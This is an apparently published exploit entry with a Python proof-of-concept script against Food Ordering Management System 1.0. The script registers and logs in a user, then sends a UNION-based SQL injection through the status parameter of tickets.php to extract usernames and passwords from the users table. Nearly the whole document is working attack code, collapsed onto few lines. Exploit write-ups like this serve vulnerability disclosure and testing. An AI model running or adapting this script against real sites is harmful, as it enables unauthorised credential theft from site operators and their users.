Food Ordering Management System 1.0 SQL Injection

# Exploit Title: Food Ordering Management System - SQL Injection# Google Dork: N/A# Date: 2022-9-27# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/foms.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0#/usr/bin/python3 import requests import osimport sysimport timeimport randomfrom bs4 import BeautifulSoup# clean screenos.system("cls")os.system("clear")logo = '''###################################################################                                                                #  #           SQL injection (Food Ordering Management System)      ##                                                                ###################################################################'''print(logo)url = str(input("Enter website url =>  "))username = str(input("Enter Username => : "))name = ("test123456")password = ("test123456")phone = ("4511233199")number = ("1234567891000000")cvv = ("444")req = requests.Session()regsiter_page = (url+"/foms/routers/register-router.php")regsiter = {'username':username,'name':name,'password':password,'phone':phone,'number':number,'cvv':cvv}req_regsiter = req.post(regsiter_page,data=regsiter)print("[+] Regsiter Successfully")login = {'username':username,'password':password}login_page = (url+"/foms/routers/router.php")req_login = req.post(login_page,data=login)print("[+] Login Successfully")sql = req.get(url+"/foms/tickets.php?status=Open' union select 1,2,username,4,password,6,7,8 from users-- -")text = sql.textsoup = BeautifulSoup(text,"html.parser")print("[+] SQL Injction Get Users and Password from table Users")for link in soup.findAll(True, {'class':['task-cat light-blue', 'collections-title']}):    time.sleep(0.2)    print(link.get)